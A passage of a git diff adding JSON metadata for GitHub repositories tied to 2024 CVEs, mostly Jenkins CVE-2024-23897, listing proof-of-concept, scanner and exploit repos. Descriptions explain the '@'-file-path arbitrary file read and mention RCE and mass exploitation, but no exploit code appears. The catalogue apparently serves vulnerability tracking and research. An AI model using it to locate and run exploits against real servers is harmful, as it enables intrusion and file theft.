"stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23774.json b/2024/CVE-2024-23774.json new file mode 100644 index 0000000000..db76a48011 --- /dev/null +++ b/2024/CVE-2024-23774.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041345, + "name": "CVE-2024-23774", + "full_name": "Verrideo\/CVE-2024-23774", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23774", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:59:03Z", + "updated_at": "2024-02-05T10:59:03Z", + "pushed_at": "2024-02-05T11:02:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23780.json b/2024/CVE-2024-23780.json new file mode 100644 index 0000000000..28239d9f36 --- /dev/null +++ b/2024/CVE-2024-23780.json @@ -0,0 +1,33 @@ +[ + { + "id": 769096857, + "name": "CVE-2024-23780", + "full_name": "HazardLab-IO\/CVE-2024-23780", + "owner": { + "login": "HazardLab-IO", + "id": 162697088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162697088?v=4", + "html_url": "https:\/\/github.com\/HazardLab-IO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HazardLab-IO\/CVE-2024-23780", + "description": "Netbox - CVE-2024-23780", + "fork": false, + "created_at": "2024-03-08T10:39:59Z", + "updated_at": "2024-03-08T10:48:18Z", + "pushed_at": "2024-03-08T10:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2389.json b/2024/CVE-2024-2389.json new file mode 100644 index 0000000000..dfb190a90d --- /dev/null +++ b/2024/CVE-2024-2389.json @@ -0,0 +1,33 @@ +[ + { + "id": 785250757, + "name": "CVE-2024-2389", + "full_name": "adhikara13\/CVE-2024-2389", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-2389", + "description": null, + "fork": false, + "created_at": "2024-04-11T14:03:23Z", + "updated_at": "2024-06-18T15:57:47Z", + "pushed_at": "2024-04-11T14:33:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23897.json b/2024/CVE-2024-23897.json new file mode 100644 index 0000000000..7afa3f2084 --- /dev/null +++ b/2024/CVE-2024-23897.json @@ -0,0 +1,1110 @@ +[ + { + "id": 747359905, + "name": "SECURITY-3314-3315", + "full_name": "jenkinsci-cert\/SECURITY-3314-3315", + "owner": { + "login": "jenkinsci-cert", + "id": 9285726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9285726?v=4", + "html_url": "https:\/\/github.com\/jenkinsci-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jenkinsci-cert\/SECURITY-3314-3315", + "description": "Workaround for disabling the CLI to mitigate SECURITY-3314\/CVE-2024-23897 and SECURITY-3315\/CVE-2024-23898", + "fork": false, + "created_at": "2024-01-23T19:19:04Z", + "updated_at": "2024-11-23T04:50:22Z", + "pushed_at": "2024-02-20T14:13:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 748543127, + "name": "CVE-2024-23897", + "full_name": "binganao\/CVE-2024-23897", + "owner": { + "login": "binganao", + "id": 70050083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70050083?v=4", + "html_url": "https:\/\/github.com\/binganao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binganao\/CVE-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-26T08:02:00Z", + "updated_at": "2024-12-24T03:28:56Z", + "pushed_at": "2024-02-01T06:50:32Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 100, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748577478, + "name": "CVE-2024-23897", + "full_name": "h4x0r-dz\/CVE-2024-23897", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-23897", + "description": "CVE-2024-23897", + "fork": false, + "created_at": "2024-01-26T09:44:32Z", + "updated_at": "2024-12-27T15:16:52Z", + "pushed_at": "2024-01-28T06:47:28Z", + "stargazers_count": 197, + "watchers_count": 197, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 197, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 748785405, + "name": "CVE-2024-23897", + "full_name": "xaitax\/CVE-2024-23897", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-23897", + "description": "CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner. ", + "fork": false, + "created_at": "2024-01-26T19:00:03Z", + "updated_at": "2024-11-16T23:00:32Z", + "pushed_at": "2024-02-29T12:13:21Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 70, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 748847022, + "name": "poc-cve-2024-23897", + "full_name": "vmtyan\/poc-cve-2024-23897", + "owner": { + "login": "vmtyan", + "id": 157635595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157635595?v=4", + "html_url": "https:\/\/github.com\/vmtyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vmtyan\/poc-cve-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-26T21:39:26Z", + "updated_at": "2024-10-05T09:45:00Z", + "pushed_at": "2024-01-26T21:46:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748932948, + "name": "CVE-2024-23897", + "full_name": "yoryio\/CVE-2024-23897", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-23897", + "description": "Scanner for CVE-2024-23897 - Jenkins", + "fork": false, + "created_at": "2024-01-27T04:35:20Z", + "updated_at": "2024-02-09T17:37:28Z", + "pushed_at": "2024-03-13T05:52:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-23897", + "jenkins" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749052396, + "name": "CVE-2024-23897", + "full_name": "3yujw7njai\/CVE-2024-23897", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2024-23897", + "description": "CVE-2024-23897 jenkins-cli", + "fork": false, + "created_at": "2024-01-27T12:57:28Z", + "updated_at": "2024-11-18T12:15:19Z", + "pushed_at": "2024-01-27T13:10:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749060845, + "name": "PoC-Fix-jenkins-rce_CVE-2024-23897", + "full_name": "10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897", + "owner": { + "login": "10T4", + "id": 148342080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148342080?v=4", + "html_url": "https:\/\/github.com\/10T4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897", + "description": "on this git you can find all information on the CVE-2024-23897", + "fork": false, + "created_at": "2024-01-27T13:27:57Z", + "updated_at": "2024-03-18T21:30:46Z", + "pushed_at": "2024-01-27T14:43:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749172653, + "name": "CVE-2024-23897", + "full_name": "wjlin0\/CVE-2024-23897", + "owner": { + "login": "wjlin0", + "id": 91306421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91306421?v=4", + "html_url": "https:\/\/github.com\/wjlin0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjlin0\/CVE-2024-23897", + "description": "CVE-2024-23897 - Jenkins 任意文件读取 利用工具", + "fork": false, + "created_at": "2024-01-27T19:34:48Z", + "updated_at": "2024-12-02T07:35:19Z", + "pushed_at": "2024-03-16T07:55:41Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-23897", + "jenkins" + ], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 749248494, + "name": "CVE-2024-23897", + "full_name": "Vozec\/CVE-2024-23897", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2024-23897", + "description": "This repository presents a proof-of-concept of CVE-2024-23897", + "fork": false, + "created_at": "2024-01-28T01:57:06Z", + "updated_at": "2024-10-14T07:36:09Z", + "pushed_at": "2024-04-16T06:56:39Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 749389006, + "name": "CVE-2024-23897", + "full_name": "r0xdeadbeef\/CVE-2024-23897", + "owner": { + "login": "r0xdeadbeef", + "id": 65211256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4", + "html_url": "https:\/\/github.com\/r0xdeadbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0xdeadbeef\/CVE-2024-23897", + "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.", + "fork": false, + "created_at": "2024-01-28T12:53:23Z", + "updated_at": "2024-01-29T18:53:19Z", + "pushed_at": "2024-01-28T13:28:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749635165, + "name": "CVE-2024-23897", + "full_name": "viszsec\/CVE-2024-23897", + "owner": { + "login": "viszsec", + "id": 8476317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8476317?v=4", + "html_url": "https:\/\/github.com\/viszsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viszsec\/CVE-2024-23897", + "description": "Jenkins POC of Arbitrary file read vulnerability through the CLI can lead to RCE", + "fork": false, + "created_at": "2024-01-29T04:41:53Z", + "updated_at": "2024-08-16T09:02:15Z", + "pushed_at": "2024-01-31T03:14:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749788968, + "name": "CVE-2024-23897", + "full_name": "jopraveen\/CVE-2024-23897", + "owner": { + "login": "jopraveen", + "id": 56404692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56404692?v=4", + "html_url": "https:\/\/github.com\/jopraveen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jopraveen\/CVE-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-29T12:00:25Z", + "updated_at": "2024-01-29T18:02:51Z", + "pushed_at": "2024-01-29T12:14:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751156545, + "name": "Jenkins-CVE-2024-23897", + "full_name": "AbraXa5\/Jenkins-CVE-2024-23897", + "owner": { + "login": "AbraXa5", + "id": 41234094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41234094?v=4", + "html_url": "https:\/\/github.com\/AbraXa5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbraXa5\/Jenkins-CVE-2024-23897", + "description": "PoC for Jenkins CVE-2024-23897", + "fork": false, + "created_at": "2024-02-01T03:17:35Z", + "updated_at": "2024-02-05T03:54:30Z", + "pushed_at": "2024-02-04T18:31:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752057600, + "name": "CVE-2024-23897-RCE", + "full_name": "brijne\/CVE-2024-23897-RCE", + "owner": { + "login": "brijne", + "id": 158627341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158627341?v=4", + "html_url": "https:\/\/github.com\/brijne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brijne\/CVE-2024-23897-RCE", + "description": "CVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE", + "fork": false, + "created_at": "2024-02-02T23:13:26Z", + "updated_at": "2024-02-02T23:13:27Z", + "pushed_at": "2024-02-02T23:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752485327, + "name": "Jenkins-CVE-2024-23897-", + "full_name": "WLXQqwer\/Jenkins-CVE-2024-23897-", + "owner": { + "login": "WLXQqwer", + "id": 125850977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125850977?v=4", + "html_url": "https:\/\/github.com\/WLXQqwer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WLXQqwer\/Jenkins-CVE-2024-23897-", + "description": null, + "fork": false, + "created_at": "2024-02-04T01:14:40Z", + "updated_at": "2024-02-04T01:21:30Z", + "pushed_at": "2024-02-04T01:23:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752803918, + "name": "CVE-2024-23897", + "full_name": "kaanatmacaa\/CVE-2024-23897", + "owner": { + "login": "kaanatmacaa", + "id": 57772940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57772940?v=4", + "html_url": "https:\/\/github.com\/kaanatmacaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaanatmacaa\/CVE-2024-23897", + "description": "Nuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)", + "fork": false, + "created_at": "2024-02-04T20:56:42Z", + "updated_at": "2024-11-20T20:01:17Z", + "pushed_at": "2024-02-05T14:10:26Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754184572, + "name": "CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "full_name": "Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability", + "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.", + "fork": false, + "created_at": "2024-02-07T15:07:37Z", + "updated_at": "2024-11-09T20:19:57Z", + "pushed_at": "2024-02-09T13:22:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757151446, + "name": "CVE-2024-23897", + "full_name": "B4CK4TT4CK\/CVE-2024-23897", + "owner": { + "login": "B4CK4TT4CK", + "id": 76169213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76169213?v=4", + "html_url": "https:\/\/github.com\/B4CK4TT4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B4CK4TT4CK\/CVE-2024-23897", + "description": "CVE-2024-23897", + "fork": false, + "created_at": "2024-02-13T22:38:50Z", + "updated_at": "2024-02-13T22:40:08Z", + "pushed_at": "2024-02-13T22:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 758374072, + "name": "CVE-2024-23897", + "full_name": "godylockz\/CVE-2024-23897", + "owner": { + "login": "godylockz", + "id": 81207744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81207744?v=4", + "html_url": "https:\/\/github.com\/godylockz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/godylockz\/CVE-2024-23897", + "description": "POC for CVE-2024-23897 Jenkins File-Read ", + "fork": false, + "created_at": "2024-02-16T07:16:04Z", + "updated_at": "2025-01-05T07:57:38Z", + "pushed_at": "2024-02-17T16:39:19Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758722924, + "name": "CVE-2024-23897", + "full_name": "ifconfig-me\/CVE-2024-23897", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-23897", + "description": "Jenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]", + "fork": false, + "created_at": "2024-02-16T23:21:40Z", + "updated_at": "2024-02-16T23:23:25Z", + "pushed_at": "2024-02-17T15:20:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759622445, + "name": "CVE-2024-23897", + "full_name": "ThatNotEasy\/CVE-2024-23897", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-23897", + "description": "Perform with massive Jenkins Reading-2-RCE", + "fork": false, + "created_at": "2024-02-19T02:29:12Z", + "updated_at": "2024-10-06T15:53:26Z", + "pushed_at": "2024-03-02T07:55:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 760525998, + "name": "CVE-2024-23897-Arbitrary-file-read", + "full_name": "pulentoski\/CVE-2024-23897-Arbitrary-file-read", + "owner": { + "login": "pulentoski", + "id": 60004847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4", + "html_url": "https:\/\/github.com\/pulentoski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pulentoski\/CVE-2024-23897-Arbitrary-file-read", + "description": "Un script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897 ", + "fork": false, + "created_at": "2024-02-20T15:26:34Z", + "updated_at": "2024-11-18T19:25:24Z", + "pushed_at": "2024-11-18T19:25:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761368362, + "name": "CVE-2024-23897", + "full_name": "Nebian\/CVE-2024-23897", + "owner": { + "login": "Nebian", + "id": 57531705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531705?v=4", + "html_url": "https:\/\/github.com\/Nebian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nebian\/CVE-2024-23897", + "description": "Scraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.", + "fork": false, + "created_at": "2024-02-21T18:32:45Z", + "updated_at": "2024-02-23T23:55:35Z", + "pushed_at": "2024-02-21T19:07:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795412184, + "name": "CVE-2024-23897", + "full_name": "JAthulya\/CVE-2024-23897", + "owner": { + "login": "JAthulya", + "id": 55212811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55212811?v=4", + "html_url": "https:\/\/github.com\/JAthulya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAthulya\/CVE-2024-23897", + "description": "Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability", + "fork": false, + "created_at": "2024-05-03T08:18:51Z", + "updated_at": "2024-08-29T16:22:10Z", + "pushed_at": "2024-05-03T08:33:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797182683, + "name": "CVE-2024-23897", + "full_name": "murataydemir\/CVE-2024-23897", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2024-23897", + "description": "[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-05-07T11:00:03Z", + "updated_at": "2024-05-07T14:44:44Z", + "pushed_at": "2024-05-07T14:28:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797525465, + "name": "CVE-2024-23897-Jenkins-4.441", + "full_name": "mil4ne\/CVE-2024-23897-Jenkins-4.441", + "owner": { + "login": "mil4ne", + "id": 89859279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4", + "html_url": "https:\/\/github.com\/mil4ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mil4ne\/CVE-2024-23897-Jenkins-4.441", + "description": null, + "fork": false, + "created_at": "2024-05-08T02:28:46Z", + "updated_at": "2024-07-26T03:10:16Z", + "pushed_at": "2024-05-08T02:34:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801466453, + "name": "CVE-2024-23897", + "full_name": "Maalfer\/CVE-2024-23897", + "owner": { + "login": "Maalfer", + "id": 96432001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96432001?v=4", + "html_url": "https:\/\/github.com\/Maalfer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maalfer\/CVE-2024-23897", + "description": "Poc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos leer archivos internos del sistema sin estar autenticados", + "fork": false, + "created_at": "2024-05-16T09:32:51Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-17T11:54:26Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 806068547, + "name": "Surko-Exploit-Jenkins-CVE-2024-23897", + "full_name": "Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897", + "owner": { + "login": "Surko888", + "id": 69545458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69545458?v=4", + "html_url": "https:\/\/github.com\/Surko888", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Surko888\/Surko-Exploit-Jenkins-CVE-2024-23897", + "description": "Un exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)", + "fork": false, + "created_at": "2024-05-26T09:35:54Z", + "updated_at": "2024-06-01T23:48:46Z", + "pushed_at": "2024-06-01T23:48:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834942808, + "name": "CVE-2024-23897", + "full_name": "cc3305\/CVE-2024-23897", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2024-23897", + "description": "CVE-2024-23897 exploit script", + "fork": false, + "created_at": 